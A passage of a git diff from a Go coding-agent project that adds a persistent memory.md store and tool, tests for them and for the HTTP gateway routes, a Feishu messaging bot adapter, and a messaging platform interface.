+	if len(got.Steps) != 2 {
+		t.Errorf("expected 2 steps, got %d", len(got.Steps))
+	}
+}
+
+func TestGatewayRoutesRegistered(t *testing.T) {
+	gw := NewGateway("localhost:8090", "", "0.1.27")
+
+	// Check that HTTP routes are registered (skip /ws which requires Hijack)
+	routes := []string{
+		"/api/health",
+		"/api/status",
+		"/api/sessions",
+		"/api/memory",
+		"/api/platforms",
+	}
+
+	for _, route := range routes {
+		req := httptest.NewRequest("GET", route, nil)
+		w := httptest.NewRecorder()
+		gw.mux.ServeHTTP(w, req)
+		// We just want to verify the route exists (not 404 from mux)
+		if w.Code == http.StatusNotFound && w.Body.String() == "404 page not found\n" {
+			t.Errorf("route %s not registered", route)
+		}
+	}
+}
diff --git a/internal/memory/store.go b/internal/memory/store.go
new file mode 100644
index 0000000..5880d1c
--- /dev/null
+++ b/internal/memory/store.go
@@ -0,0 +1,349 @@
+// Package memory implements persistent memory storage for Hermes mode.
+// Memory is stored as a human-readable Markdown file (memory.md).
+package memory
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// Store manages reading and writing of memory.md files.
+type Store struct {
+	mu sync.Mutex
+
+	// explicitPath overrides auto-discovery when set via config.
+	explicitPath string
+	// workDir is the project working directory, used as fallback for default write path.
+	workDir string
+}
+
+// NewStore creates a memory store.
+// If explicitPath is non-empty, it overrides the default discovery logic.
+// workDir is used as fallback directory for creating new memory files.
+func NewStore(explicitPath, workDir string) *Store {
+	return &Store{explicitPath: explicitPath, workDir: workDir}
+}
+
+// defaultTemplate is the initial content for a new memory.md file.
+const defaultTemplate = `# Agent Memory
+
+## User Profile
+
+## Working Memory
+
+## Lessons Learned
+`
+
+// Resolve finds the memory.md file to use.
+// Priority: explicit path → .vibe/memory.md → <GLOBAL_DIR>/memory.md
+// Returns (path, source, error). source is "explicit", "project", "global", or "".
+func (s *Store) Resolve() (path string, source string, err error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	return s.resolveNoLock()
+}
+
+func (s *Store) resolveNoLock() (path string, source string, err error) {
+	// 1. Explicit path from config
+	if s.explicitPath != "" {
+		if _, err := os.Stat(s.explicitPath); err == nil {
+			return s.explicitPath, "explicit", nil
+		}
+		// Explicit path configured but doesn't exist yet — will create here on write
+		return s.explicitPath, "explicit", nil
+	}
+
+	// 2. Project-level: .vibe/memory.md
+	projectPath := filepath.Join(".vibe", "memory.md")
+	if _, err := os.Stat(projectPath); err == nil {
+		return projectPath, "project", nil
+	}
+
+	// 3. Global: <GLOBAL_DIR>/memory.md
+	globalPath := filepath.Join(config.ConfigDir(), "memory.md")
+	if _, err := os.Stat(globalPath); err == nil {
+		return globalPath, "global", nil
+	}
+
+	// None exists — return empty (will be created on first write)
+	return "", "", nil
+}
+
+// Read returns the full content of memory.md.
+func (s *Store) Read() (content string, path string, source string, err error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	return s.readNoLock()
+}
+
+func (s *Store) readNoLock() (content string, path string, source string, err error) {
+	path, source, err = s.resolveNoLock()
+	if err != nil {
+		return "", "", "", err
+	}
+	if path == "" {
+		return "", "", "", nil // no memory file exists
+	}
+
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return "", path, source, nil
+		}
+		return "", "", "", fmt.Errorf("read memory file: %w", err)
+	}
+
+	return string(data), path, source, nil
+}
+
+// ReadSection returns the content of a specific ## section.
+func (s *Store) ReadSection(section string) (string, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	content, _, _, err := s.readNoLock()
+	if err != nil {
+		return "", err
+	}
+	if content == "" {
+		return "", nil
+	}
+
+	return extractSection(content, section), nil
+}
+
+// Add appends a line to a specific section.
+func (s *Store) Add(section, entry string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	content, path, _, err := s.readNoLock()
+	if err != nil {
+		return err
+	}
+
+	if path == "" {
+		// Create new file
+		path = s.defaultWritePath()
+		content = defaultTemplate
+	}
+
+	updated := addToSection(content, section, entry)
+	return s.writeFile(path, updated)
+}
+
+// Update replaces old text with new text in a section.
+func (s *Store) Update(section, oldText, newText string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	content, path, _, err := s.readNoLock()
+	if err != nil {
+		return err
+	}
+	if path == "" || content == "" {
+		return fmt.Errorf("no memory file to update")
+	}
+
+	sectionContent := extractSection(content, section)
+	if sectionContent == "" {
+		return fmt.Errorf("section '%s' not found", section)
+	}
+
+	if !strings.Contains(sectionContent, oldText) {
+		return fmt.Errorf("text not found in section '%s'", section)
+	}
+
+	updated, ok := replaceInSection(content, section, oldText, newText)
+	if !ok {
+		return fmt.Errorf("text not found in section '%s'", section)
+	}
+	return s.writeFile(path, updated)
+}
+
+// Delete removes a line from a section.
+func (s *Store) Delete(section, entry string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	content, path, _, err := s.readNoLock()
+	if err != nil {
+		return err
+	}
+	if path == "" || content == "" {
+		return fmt.Errorf("no memory file to delete from")
+	}
+
+	updated, found := deleteFromSection(content, section, entry)
+	if !found {
+		return fmt.Errorf("entry not found in section '%s'", section)
+	}
+
+	return s.writeFile(path, updated)
+}
+
+// WriteAll overwrites the entire memory.md content.
+func (s *Store) WriteAll(content string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	_, path, _, err := s.readNoLock()
+	if err != nil {
+		return err
+	}
+	if path == "" {
+		path = s.defaultWritePath()
+	}
+	return s.writeFile(path, content)
+}
+
+// --- Helpers ---
+
+// defaultWritePath determines where to create a new memory.md.
+// Default: project-level (.vibe/memory.md). Only uses global if explicitly configured.
+func (s *Store) defaultWritePath() string {
+	if s.explicitPath != "" {
+		return s.explicitPath
+	}
+	// Default to project-level: workDir/.vibe/memory.md
+	if s.workDir != "" {
+		return filepath.Join(s.workDir, ".vibe", "memory.md")
+	}
+	// Fallback: cwd/.vibe/memory.md
+	return filepath.Join(".vibe", "memory.md")
+}
+
+func replaceInSection(content, section, oldText, newText string) (string, bool) {
+	start, end, ok := sectionBounds(content, section)
+	if !ok {
+		return content, false
+	}
+	segment := content[start:end]
+	if !strings.Contains(segment, oldText) {
+		return content, false
+	}
+	segment = strings.Replace(segment, oldText, newText, 1)
+	return content[:start] + segment + content[end:], true
+}
+
+func deleteFromSection(content, section, entry string) (string, bool) {
+	start, end, ok := sectionBounds(content, section)
+	if !ok {
+		return content, false
+	}
+	segment := content[start:end]
+	lines := strings.Split(segment, "\n")
+	result := make([]string, 0, len(lines))
+	found := false
+	for _, line := range lines {
+		trimmed := strings.TrimSpace(line)
+		// Match "- entry" or "entry" (with or without bullet)
+		cleanEntry := strings.TrimPrefix(strings.TrimSpace(entry), "- ")
+		cleanLine := strings.TrimPrefix(trimmed, "- ")
+		if cleanLine == cleanEntry && !found {
+			found = true
+			continue // skip this line
+		}
+		result = append(result, line)
+	}
+	if !found {
+		return content, false
+	}
+	return content[:start] + strings.Join(result, "\n") + content[end:], true
+}
+
+func sectionBounds(content, section string) (start, end int, ok bool) {
+	header := "## " + section
+	idx := strings.Index(content, header)
+	if idx < 0 {
+		return 0, 0, false
+	}
+	afterHeader := content[idx+len(header):]
+	nlIdx := strings.Index(afterHeader, "\n")
+	if nlIdx < 0 {
+		return len(content), len(content), true
+	}
+	start = idx + len(header) + nlIdx + 1
+	rest := content[start:]
+	nextSection := strings.Index(rest, "\n## ")
+	if nextSection >= 0 {
+		return start, start + nextSection, true
+	}
+	return start, len(content), true
+}
+
+// writeFile writes content to path, creating parent dirs as needed.
+func (s *Store) writeFile(path, content string) error {
+	dir := filepath.Dir(path)
+	if err := os.MkdirAll(dir, 0700); err != nil {
+		return fmt.Errorf("create directory: %w", err)
+	}
+	return os.WriteFile(path, []byte(content), 0600)
+}
+
+// extractSection extracts content under a ## heading.
+func extractSection(content, section string) string {
+	header := "## " + section
+	idx := strings.Index(content, header)
+	if idx < 0 {
+		return ""
+	}
+
+	// Find the start of content after the header line
+	afterHeader := content[idx+len(header):]
+	nlIdx := strings.Index(afterHeader, "\n")
+	if nlIdx < 0 {
+		return ""
+	}
+	afterHeader = afterHeader[nlIdx+1:]
+
+	// Find the next ## heading or end of file
+	nextSection := strings.Index(afterHeader, "\n## ")
+	if nextSection >= 0 {
+		afterHeader = afterHeader[:nextSection]
+	}
+
+	return strings.TrimSpace(afterHeader)
+}
+
+// addToSection appends an entry to a section. Creates the section if missing.
+func addToSection(content, section, entry string) string {
+	header := "## " + section
+
+	// Ensure entry has bullet prefix
+	trimmedEntry := strings.TrimSpace(entry)
+	if !strings.HasPrefix(trimmedEntry, "- ") {
+		trimmedEntry = "- " + trimmedEntry
+	}
+
+	idx := strings.Index(content, header)
+	if idx < 0 {
+		// Section doesn't exist — append at end
+		return strings.TrimRight(content, "\n") + "\n\n" + header + "\n\n" + trimmedEntry + "\n"
+	}
+
+	// Find the end of this section (next ## or EOF)
+	afterHeader := content[idx+len(header):]
+	nlIdx := strings.Index(afterHeader, "\n")
+	if nlIdx < 0 {
+		return content + "\n\n" + trimmedEntry + "\n"
+	}
+
+	sectionStart := idx + len(header) + nlIdx + 1
+	rest := content[sectionStart:]
+
+	nextSection := strings.Index(rest, "\n## ")
+	if nextSection >= 0 {
+		// Insert before next section
+		insertPoint := sectionStart + nextSection
+		return content[:insertPoint] + trimmedEntry + "\n" + content[insertPoint:]
+	}
+
+	// Append at end
+	return strings.TrimRight(content, "\n") + "\n" + trimmedEntry + "\n"
+}
diff --git a/internal/memory/store_test.go b/internal/memory/store_test.go
new file mode 100644
index 0000000..85d0fdc
--- /dev/null
+++ b/internal/memory/store_test.go
@@ -0,0 +1,319 @@
+package memory
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+func TestStoreReadWrite(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	store := NewStore(path, "")
+
+	// No file yet
+	content, _, _, err := store.Read()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if content != "" {
+		t.Errorf("expected empty, got %q", content)
+	}
+
+	// Add creates file
+	if err := store.Add("User Profile", "prefers Go"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, rpath, source, err := store.Read()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if rpath != path {
+		t.Errorf("expected path %s, got %s", path, rpath)
+	}
+	if source != "explicit" {
+		t.Errorf("expected source explicit, got %s", source)
+	}
+	if !strings.Contains(content, "- prefers Go") {
+		t.Errorf("expected content to contain 'prefers Go', got %q", content)
+	}
+}
+
+func TestStoreReadSection(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- likes Go
+- prefers vim
+
+## Working Memory
+
+- project version is v0.1.27
+
+## Lessons Learned
+
+- always read before edit
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	section, err := store.ReadSection("User Profile")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !strings.Contains(section, "likes Go") {
+		t.Errorf("expected 'likes Go' in section, got %q", section)
+	}
+	if strings.Contains(section, "project version") {
+		t.Error("section should not contain Working Memory content")
+	}
+
+	section, err = store.ReadSection("Working Memory")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !strings.Contains(section, "project version") {
+		t.Errorf("expected 'project version' in section, got %q", section)
+	}
+
+	section, err = store.ReadSection("Nonexistent")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if section != "" {
+		t.Errorf("expected empty for nonexistent section, got %q", section)
+	}
+}
+
+func TestStoreAdd(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- likes Go
+
+## Working Memory
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Add("Working Memory", "new fact"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "- new fact") {
+		t.Errorf("expected added entry, got %q", content)
+	}
+	// Original content should still be there
+	if !strings.Contains(content, "- likes Go") {
+		t.Errorf("original content lost")
+	}
+}
+
+func TestStoreUpdate(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## Working Memory
+
+- version is v0.1.26
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Update("Working Memory", "v0.1.26", "v0.1.27"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "v0.1.27") {
+		t.Errorf("expected updated text, got %q", content)
+	}
+	if strings.Contains(content, "v0.1.26") {
+		t.Error("old text should be replaced")
+	}
+}
+
+func TestStoreUpdateOnlyWithinSection(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- shared fact
+
+## Working Memory
+
+- shared fact
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Update("Working Memory", "shared fact", "working fact"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "## User Profile\n\n- shared fact") {
+		t.Fatalf("user profile entry should remain unchanged, got %q", content)
+	}
+	if !strings.Contains(content, "## Working Memory\n\n- working fact") {
+		t.Fatalf("working memory entry should be updated, got %q", content)
+	}
+}
+
+func TestStoreDelete(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## Working Memory
+
+- fact one
+- fact two
+- fact three
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Delete("Working Memory", "fact two"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if strings.Contains(content, "fact two") {
+		t.Error("deleted entry should not be present")
+	}
+	if !strings.Contains(content, "fact one") || !strings.Contains(content, "fact three") {
+		t.Error("non-deleted entries should remain")
+	}
+}
+
+func TestStoreDeleteOnlyWithinSection(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- shared fact
+
+## Working Memory
+
+- shared fact
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Delete("Working Memory", "shared fact"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "## User Profile\n\n- shared fact") {
+		t.Fatalf("user profile entry should remain, got %q", content)
+	}
+	working := extractSection(content, "Working Memory")
+	if strings.Contains(working, "shared fact") {
+		t.Fatalf("working memory entry should be removed, got %q", working)
+	}
+}
+
+func TestStoreWriteAllUsesReadPath(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+	os.WriteFile(path, []byte("# old"), 0600)
+	store := NewStore(path, "")
+
+	if err := store.WriteAll("# new"); err != nil {
+		t.Fatal(err)
+	}
+
+	got, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(got) != "# new" {
+		t.Fatalf("content = %q, want # new", string(got))
+	}
+}
+
+func TestStoreAddNewSection(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "memory.md")
+
+	md := `# Agent Memory
+
+## User Profile
+
+- likes Go
+`
+	os.WriteFile(path, []byte(md), 0600)
+	store := NewStore(path, "")
+
+	if err := store.Add("Custom Section", "custom fact"); err != nil {
+		t.Fatal(err)
+	}
+
+	content, _, _, _ := store.Read()
+	if !strings.Contains(content, "## Custom Section") {
+		t.Error("new section should be created")
+	}
+	if !strings.Contains(content, "- custom fact") {
+		t.Error("content should be added to new section")
+	}
+}
+
+func TestExtractSection(t *testing.T) {
+	content := `# Memory
+
+## First
+
+- a
+- b
+
+## Second
+
+- c
+
+## Third
+
+- d
+`
+	first := extractSection(content, "First")
+	if first != "- a\n- b" {
+		t.Errorf("First section: %q", first)
+	}
+
+	second := extractSection(content, "Second")
+	if second != "- c" {
+		t.Errorf("Second section: %q", second)
+	}
+
+	third := extractSection(content, "Third")
+	if third != "- d" {
+		t.Errorf("Third section: %q", third)
+	}
+
+	missing := extractSection(content, "Missing")
+	if missing != "" {
+		t.Errorf("Missing section should be empty: %q", missing)
+	}
+}
diff --git a/internal/memory/tool.go b/internal/memory/tool.go
new file mode 100644
index 0000000..f7e115a
--- /dev/null
+++ b/internal/memory/tool.go
@@ -0,0 +1,158 @@
+package memory
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// MemoryTool provides persistent memory read/write via memory.md.
+type MemoryTool struct {
+	store *Store
+}
+
+// NewMemoryTool creates a new memory tool.
+func NewMemoryTool(store *Store) *MemoryTool {
+	return &MemoryTool{store: store}
+}
+
+func (t *MemoryTool) Name() string {
+	return "memory"
+}
+
+func (t *MemoryTool) Description() string {
+	return "Read and write persistent memory (memory.md). Use to recall user preferences, project context, and lessons learned. Memory persists across sessions."
+}
+
+func (t *MemoryTool) PromptSnippet() string {
+	return "Read/write persistent memory across sessions"
+}
+
+func (t *MemoryTool) PromptGuidelines() []string {
+	return []string{
+		"A persistent memory file (memory.md) is available via the `memory` tool. Read it at the start of complex tasks to recall user preferences and prior context. Update it when you learn important facts about the user or project.",
+	}
+}
+
+func (t *MemoryTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"action": {
+				"type": "string",
+				"description": "The action to perform: read, add, update, delete",
+				"enum": ["read", "add", "update", "delete"]
+			},
+			"section": {
+				"type": "string",
+				"description": "The section name (e.g. 'User Profile', 'Working Memory', 'Lessons Learned'). Required for add/update/delete. Optional for read (omit to read all)."
+			},
+			"content": {
+				"type": "string",
+				"description": "The content to add or delete. Required for add and delete actions."
+			},
+			"old": {
+				"type": "string",
+				"description": "The old text to replace. Required for update action."
+			},
+			"new": {
+				"type": "string",
+				"description": "The new text to replace with. Required for update action."
+			}
+		},
+		"required": ["action"]
+	}`)
+}
+
+func (t *MemoryTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	action, _ := params["action"].(string)
+	section, _ := params["section"].(string)
+	content, _ := params["content"].(string)
+	old, _ := params["old"].(string)
+	new_, _ := params["new"].(string)
+
+	switch action {
+	case "read":
+		return t.executeRead(section)
+	case "add":
+		return t.executeAdd(section, content)
+	case "update":
+		return t.executeUpdate(section, old, new_)
+	case "delete":
+		return t.executeDelete(section, content)
+	default:
+		return tools.ToolResult{}, fmt.Errorf("unknown action: %s (use: read, add, update, delete)", action)
+	}
+}
+
+func (t *MemoryTool) executeRead(section string) (tools.ToolResult, error) {
+	if section != "" {
+		content, err := t.store.ReadSection(section)
+		if err != nil {
+			return tools.ToolResult{}, err
+		}
+		if content == "" {
+			return tools.NewTextToolResult(fmt.Sprintf("Section '%s' is empty or not found.", section)), nil
+		}
+		return tools.NewTextToolResult(content), nil
+	}
+
+	// Read all
+	content, path, source, err := t.store.Read()
+	if err != nil {
+		return tools.ToolResult{}, err
+	}
+	if content == "" {
+		return tools.NewTextToolResult("No memory file found. Use memory(action=\"add\", section=\"...\", content=\"...\") to create one."), nil
+	}
+
+	header := fmt.Sprintf("[source: %s — %s]\n\n", source, path)
+	return tools.NewTextToolResult(header + content), nil
+}
+
+func (t *MemoryTool) executeAdd(section, content string) (tools.ToolResult, error) {
+	if section == "" {
+		return tools.ToolResult{}, fmt.Errorf("section is required for add action")
+	}
+	if content == "" {
+		return tools.ToolResult{}, fmt.Errorf("content is required for add action")
+	}
+
+	if err := t.store.Add(section, content); err != nil {
+		return tools.ToolResult{}, err
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("Added to '%s': %s", section, content)), nil
+}
+
+func (t *MemoryTool) executeUpdate(section, old, new_ string) (tools.ToolResult, error) {
+	if section == "" {
+		return tools.ToolResult{}, fmt.Errorf("section is required for update action")
+	}
+	if old == "" {
+		return tools.ToolResult{}, fmt.Errorf("old text is required for update action")
+	}
+	if new_ == "" {
+		return tools.ToolResult{}, fmt.Errorf("new text is required for update action")
+	}
+
+	if err := t.store.Update(section, old, new_); err != nil {
+		return tools.ToolResult{}, err
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("Updated in '%s': '%s' → '%s'", section, old, new_)), nil
+}
+
+func (t *MemoryTool) executeDelete(section, content string) (tools.ToolResult, error) {
+	if section == "" {
+		return tools.ToolResult{}, fmt.Errorf("section is required for delete action")
+	}
+	if content == "" {
+		return tools.ToolResult{}, fmt.Errorf("content is required for delete action")
+	}
+
+	if err := t.store.Delete(section, content); err != nil {
+		return tools.ToolResult{}, err
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("Deleted from '%s': %s", section, content)), nil
+}
diff --git a/internal/messaging/feishu/feishu.go b/internal/messaging/feishu/feishu.go
new file mode 100644
index 0000000..8791b51
--- /dev/null
+++ b/internal/messaging/feishu/feishu.go
@@ -0,0 +1,251 @@
+// Package feishu implements the Feishu (Lark) messaging platform adapter.
+// Uses the official Feishu Go SDK with WebSocket long connection for receiving messages.
+package feishu
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"log"
+	"sync"
+
+	lark "github.com/larksuite/oapi-sdk-go/v3"
+	larkcore "github.com/larksuite/oapi-sdk-go/v3/core"
+	"github.com/larksuite/oapi-sdk-go/v3/event/dispatcher"
+	larkim "github.com/larksuite/oapi-sdk-go/v3/service/im/v1"
+	larkws "github.com/larksuite/oapi-sdk-go/v3/ws"
+
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+)
+
+// Bot implements messaging.Platform for Feishu via official SDK WebSocket.
+type Bot struct {
+	appID     string
+	appSecret string
+	client    *lark.Client
+	wsClient  *larkws.Client
+	handler   messaging.MessageHandler
+	connected bool
+	mu        sync.Mutex
+	cancel    context.CancelFunc
+}
+
+// BotOptions configures a Feishu Bot.
+type BotOptions struct {
+	AppID     string
+	AppSecret string
+}
+
+// NewBot creates a new Feishu bot.
+func NewBot(opts BotOptions) *Bot {
+	client := lark.NewClient(opts.AppID, opts.AppSecret)
+	return &Bot{
+		appID:     opts.AppID,
+		appSecret: opts.AppSecret,
+		client:    client,
+	}
+}
+
+// --- messaging.Platform implementation ---
+
+func (b *Bot) Name() string { return "feishu" }
+
+func (b *Bot) IsConnected() bool {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	return b.connected
+}
+
+// Start begins receiving messages via WebSocket long connection.
+func (b *Bot) Start(ctx context.Context, handler messaging.MessageHandler) error {
+	b.mu.Lock()
+	b.handler = handler
+	ctx, cancel := context.WithCancel(ctx)
+	b.cancel = cancel
+	b.mu.Unlock()
+
+	// Create event dispatcher
+	eventDispatcher := dispatcher.NewEventDispatcher("", "").
+		OnP2MessageReceiveV1(b.onMessage)
+
+	// Create WebSocket client
+	b.wsClient = larkws.NewClient(b.appID, b.appSecret,
+		larkws.WithEventHandler(eventDispatcher),
+		larkws.WithLogLevel(larkcore.LogLevelInfo),
+	)
+
+	b.mu.Lock()
+	b.connected = true
+	b.mu.Unlock()
+
+	log.Printf("[feishu] WebSocket long connection started")
+
+	// Start blocks until connection drops or context cancelled
+	err := b.wsClient.Start(ctx)
+
+	b.mu.Lock()
+	b.connected = false
+	b.mu.Unlock()
+
+	if ctx.Err() != nil {
+		return nil // normal shutdown
+	}
+	return err
+}
+
+// Stop gracefully shuts down the bot.
+func (b *Bot) Stop() error {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	if b.cancel != nil {
+		b.cancel()
+	}
+	b.connected = false
+	return nil
+}
+
+// SendMessage sends a text message to a chat.
+func (b *Bot) SendMessage(ctx context.Context, chatID string, text string) error {
+	content, _ := json.Marshal(map[string]string{"text": text})
+	req := larkim.NewCreateMessageReqBuilder().
+		ReceiveIdType("chat_id").
+		Body(larkim.NewCreateMessageReqBodyBuilder().
+			ReceiveId(chatID).
+			MsgType("text").
+			Content(string(content)).
+			Build()).
+		Build()
+
+	resp, err := b.client.Im.Message.Create(ctx, req)
+	if err != nil {
+		return fmt.Errorf("feishu send message: %w", err)
+	}
+	if !resp.Success() {
+		return fmt.Errorf("feishu send message: code=%d msg=%s", resp.Code, resp.Msg)
+	}
+	return nil
+}
+
+// --- Event handler ---
+
+func (b *Bot) onMessage(ctx context.Context, event *larkim.P2MessageReceiveV1) error {
+	b.mu.Lock()
+	handler := b.handler
+	b.mu.Unlock()
+
+	if handler == nil {
+		return nil
+	}
+
+	msg := event.Event.Message
+	sender := event.Event.Sender
+
+	// Only handle text messages
+	if msg == nil || sender == nil {
+		return nil
+	}
+
+	msgType := ""
+	if msg.MessageType != nil {
+		msgType = *msg.MessageType
+	}
+	if msgType != "text" {
+		log.Printf("[feishu] Ignoring non-text message type: %s", msgType)
+		return nil
+	}
+
+	// Parse text content
+	var textContent struct {
+		Text string `json:"text"`
+	}
+	if msg.Content != nil {
+		json.Unmarshal([]byte(*msg.Content), &textContent)
+	}
+	if textContent.Text == "" {
+		return nil
+	}
+
+	// Extract user info
+	userID := ""
+	if sender.SenderId != nil && sender.SenderId.OpenId != nil {
+		userID = *sender.SenderId.OpenId
+	}
+
+	chatID := ""
+	if msg.ChatId != nil {
+		chatID = *msg.ChatId
+	}
+
+	inbound := messaging.InboundMessage{
+		Platform: "feishu",
+		ChatID:   chatID,
+		UserID:   userID,
+		Text:     textContent.Text,
+	}
+
+	// Handle message asynchronously
+	go func() {
+		// Create progress buffer: max 7 progress lines per batch, reserve 3 for summary
+		progressBuf := messaging.NewProgressBuffer(7, func(text string) {
+			if err := b.SendMessage(context.Background(), chatID, text); err != nil {
+				log.Printf("[feishu] Progress send error: %v", err)
+			}
+		})
+		inbound.ProgressFunc = func(text string) {
+			progressBuf.Add(text)
+		}
+
+		response, err := handler(context.Background(), inbound)
+
+		// Flush remaining progress lines before final summary
+		progressBuf.Flush()
+
+		if err != nil {
+			log.Printf("[feishu] Handler error for %s: %v", userID, err)
+			response = "⚠️ Error: " + err.Error()
+		}
+		if response != "" {
+			// Reply in the same chat
+			replyID := ""
+			if msg.MessageId != nil {
+				replyID = *msg.MessageId
+			}
+			if replyErr := b.replyMessage(context.Background(), replyID, chatID, response); replyErr != nil {
+				log.Printf("[feishu] Reply error: %v", replyErr)
+			}
+		}
+	}()
+
+	return nil
+}
+
+// replyMessage replies to a message or sends to chat.
+func (b *Bot) replyMessage(ctx context.Context, messageID, chatID, text string) error {
+	content, _ := json.Marshal(map[string]string{"text": text})
+
+	if messageID != "" {
+		// Reply to specific message
+		req := larkim.NewReplyMessageReqBuilder().
+			MessageId(messageID).
+			Body(larkim.NewReplyMessageReqBodyBuilder().
+				MsgType("text").
+				Content(string(content)).
+				Build()).
+			Build()
+
+		resp, err := b.client.Im.Message.Reply(ctx, req)
+		if err != nil {
+			return err
+		}
+		if !resp.Success() {
+			return fmt.Errorf("code=%d msg=%s", resp.Code, resp.Msg)
+		}
+		return nil
+	}
+
+	// Send to chat directly
+	return b.SendMessage(ctx, chatID, text)
+}
+
+// Ensure Bot implements messaging.Platform at compile time.
+var _ messaging.Platform = (*Bot)(nil)
diff --git a/internal/messaging/platform.go b/internal/messaging/platform.go
new file mode 100644
index 0000000..1cb85ee
--- /dev/null
+++ b/internal/messaging/platform.go
@@ -0,0 +1,40 @@
+// Package messaging defines the messaging platform abstraction for Hermes mode.
+// Each platform (WeChat, Feishu, etc.) implements the Platform interface.
+package messaging
+
+import (
+	"context"
+	"time"
+)
+
+// Platform defines the interface that all messaging platform adapters must implement.
+type Platform interface {
+	// Name returns the platform identifier (e.g. "wechat", "feishu").
+	Name() string
+	// Start begins receiving messages. Blocks until ctx is cancelled or Stop is called.
+	Start(ctx context.Context, handler MessageHandler) error
+	// Stop gracefully shuts down the platform connection.
+	Stop() error
+	// SendMessage sends a text message to a specific chat.
+	SendMessage(ctx context.Context, chatID string, text string) error
+	// IsConnected reports whether the platform is currently connected.
+	IsConnected() bool
+}
+
+// MessageHandler is called for each incoming message.
+// It returns the response text to send back to the user.
+type MessageHandler func(ctx context.Context, msg InboundMessage) (string, error)
+
+// InboundMessage represents a message received from a messaging platform.
+type InboundMessage struct {
+	Platform  string    // "wechat", "feishu", etc.
+	ChatID    string    // Conversation/chat identifier
+	UserID    string    // Sender user ID
+	UserName  string    // Sender display name
+	Text      string    // Message text content
+	Timestamp time.Time // When the message was sent
+
+	// ProgressFunc is called to send intermediate progress updates during agent execution.
+	// If nil, no progress updates are sent.
+	ProgressFunc func(text string)
+}
diff --git a/internal/messaging/progress.go b/internal/messaging/progress.go
new file mode 100644
index 0000000..042ad24
--- /dev/null
+++ b/internal/messaging/progress.go
@@ -0,0 +1,73 @@
+package messaging
+
+import (
+	"strings"
+	"sync"
+)
+
+// ProgressBuffer collects progress lines and flushes them in batches.
+// Designed for messaging platforms with per-message reply limits (e.g., WeChat: 10 replies per user message).
+//
+// Usage:
+//
+//	buf := NewProgressBuffer(maxLines, sendFunc)
+//	// During agent execution:
+//	buf.Add("[read]: file.go ✅")   // buffered
+//	buf.Add("[bash]: go build ✅")  // buffered, auto-flushes if full
+//	// After agent completes:
+//	buf.Flush()                      // send remaining lines
+type ProgressBuffer struct {
+	mu       sync.Mutex
+	lines    []string
+	maxLines int         // max lines before auto-flush
+	reserve  int         // lines reserved for final summary (not counted in maxLines)
+	sendFunc func(string) // combined send function
+	total    int         // total lines added (for logging)
+}
+
+// NewProgressBuffer creates a progress buffer.
+//
+//	maxLines: max progress lines to collect before auto-flushing (e.g., 7)
